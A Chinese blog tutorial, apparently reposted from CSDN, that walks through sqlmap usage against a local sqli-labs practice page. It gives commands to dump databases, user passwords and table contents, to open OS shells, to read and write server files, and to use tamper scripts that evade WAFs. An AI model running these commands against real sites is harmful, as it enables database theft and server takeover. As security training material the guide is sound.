sqlmap使用详解

一、sqlmap基本使用

1、判断是否存在注入

(1) 当检测参数为一个的时候:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1
在这里插入图片描述
(2)当参数大于等于两个时,需要加双引号:python2 sqlmap.py -u "http://localhost/sqli-master/Less-1/?id=1&uid=3"

(3)当测试的位置是cookie或者post传值等位置时,需将获得流量包保存在txt文件中进行测试:python2 sqlmap.py -r 1.txt

2、查询当前用户下的所有数据库

  • 命令:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 --dbs
    在这里插入图片描述

3、获取数据库中的表名

  • 使用-D指定数据库:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 -D security --tables
    在这里插入图片描述

4、获取表中的字段名

  • 使用-D指定数据库,-T指定对应的表:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 -D security -T users --columns
    在这里插入图片描述

5、获取字段内容

  • 使用-D指定数据库,-T指定对应的表,-C指定字段:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 -D security -T users -C id,password,username --dump
    在这里插入图片描述

6、获取数据库所有用户

  • 命令:python2 sqlmap.py -u http://localhost/sqli-master/Less-1/?id=1 --users
  • 在这里插入图片描述

7、获取数据库用户的密码

  • 命令:python2 sqlmap.py -u “http://localhost/sqli-master/Less-1/?id=1” --passwords
    在这里插入图片描述

8、获取当前网站数据库的名称

  • 命令:python2 sqlmap.py -u “http://localhost/sqli-master/Less-1/?id=1” --current-db
    在这里插入图片描述

9、获取当前网站数据库的用户名称

  • 命令:python2 sqlmap.py -u “http://localhost/sqli-master/Less-1/?id=1” --current-user
    在这里插入图片描述

二、sql高级用法

  • --level 探测等级:level是指探测的等级,随着level的提高,payload会增加、运行时间会增加、同时会自动破解出cookie、XFF头部等注入

  • --risk 风险等级:risk增加后,sql语句不仅会包含select语句,也会包含insert、delete、update等,很可能会对数据库造成严重的破坏,默认为等级1,不建议调高risk等级

  • --is-dba 当前用户是否为管理权限:该命令会查看当前用户是否为忽聚酷管理员权限
    在这里插入图片描述

  • --roles 列出数据库管理员角色

  • referer 检测http Referer头,当referer定义为3或者3以上时,也会尝试对referer注入

  • –sql-shell 运行自定义sql语句(可执行sql语句)

  • --os-cmd --os-shell 运行任意操作系统命令

  • --file-read 从数据库服务器中读取文件

  • --file-write --file-dest 上传文件到服务器中

  • --identify-waf 用于检测是否存在WAF、IDS、IPS

三、sqlmap自带绕过脚本tamper

sqlmap默认情况没有对默认注入的数据进行修改,如果想要绕过WAF等设备,就需要用到绕过脚本tamper对数据进行修改。在tamper脚本中,主要用到正则模块替换共计载荷字符编码的方式绕过WAF检测规则

1、常用tamper脚本

  • 编码绕过
    • apostrophe mask.py 将引号替换成UTF-8,用于过滤单引号
    • base64encode.py 替换为base64编码
    • charencode.py 对给定的payload全部字符使用url编码
    • charunicodeencode.py 字符串unicode编码
    • chardoubleencode.py 对给定的payload全部字符使用双重url编码
  • 双写绕过
    • nonrecursivereplacement 双重查找语句,用双重语句代替预定义的sql关键字
  • 大小写绕过
    • randomcase.py 随机大小写
  • 注释绕过
    • modescurityversioned.py 过滤空格,使用mysql内联注释的方式进行注入
    • modescurityzeroversioned.py 使用mysql内联注释的方式(/!000/)
    • halfversionedmorekeywords.py 当数据库为mysql是绕过防火墙,在每个关键字之前添加mysql版本的注释

2、可参考

转载于:https://blog.csdn.net/qq_45676913/article/details/112261376

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值